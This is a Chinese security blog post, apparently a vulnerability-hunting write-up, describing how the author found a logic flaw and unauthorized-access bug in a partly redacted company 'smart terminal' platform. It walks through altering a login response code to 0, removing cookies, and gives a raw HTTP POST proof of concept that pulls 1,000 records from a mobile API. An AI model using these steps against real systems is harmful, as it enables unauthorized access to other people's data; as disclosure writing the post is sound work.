一、风鸟企业查询
这里给师傅们推荐下风鸟:https://www.riskbird.com/
是一个免费的企业查询,一般在挖CNVD漏洞的时候需要满足实缴资产,所以一般都需要一个这个来查询,这个主要就是免费,蛮不错的!!!
可以看到查询结果,是上市公司满足我们的需求,那么就可以开始进行旗下的资产收集了。
二、资产收集
通过在风鸟里面,我找到了很多里面的系统,发现Jiexxx智能终端操作平台这个系统
里面有很多的相关系统,但是部分系统已经修复了,但是里面那么多,肯定还是有搞头的,可以多尝试下。
三、漏洞利用
bp抓包分析
1、抓取该系统的登录包,发现返回包是一些前端的东西,无法利用
2、所有猜测应该还存在一个手机移动端,可以使用/mobile目录
成功找到了移动端,如下:
3、然后再抓下这个手机移动端的数据包,尝试看看有没有未授权访问/逻辑缺陷漏洞
、、
4、发现这里返回包有一个code
字段,这个是可以进行修改下的,抓包然后把这个返回包的code该成0试试(逻辑缺陷漏洞)
5、成功进入后台了,未授权访问漏洞
点击查询用户信息,抓这个包
把cookie删掉,发现返回包还是正常,那么说明存在未授权
6、接下来我们就构造下POC,然后在web电脑端尝试下未授权访问
POC如下
POST /mobile/pay/GetDataList HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Connection: close
Priority: u=1
pageSize=1000&pageIndex=1
7、抓取这个登录页面的数据包,然后利用上面的POC进行修改如下两个地方,达到未授权访问漏洞
成功拿到了开始我们登录不进来的web页面端的数据了
备注:(漏洞已在CNVD提交,但已重复未归档)
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):记一次CNVD漏洞的挖掘(上)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论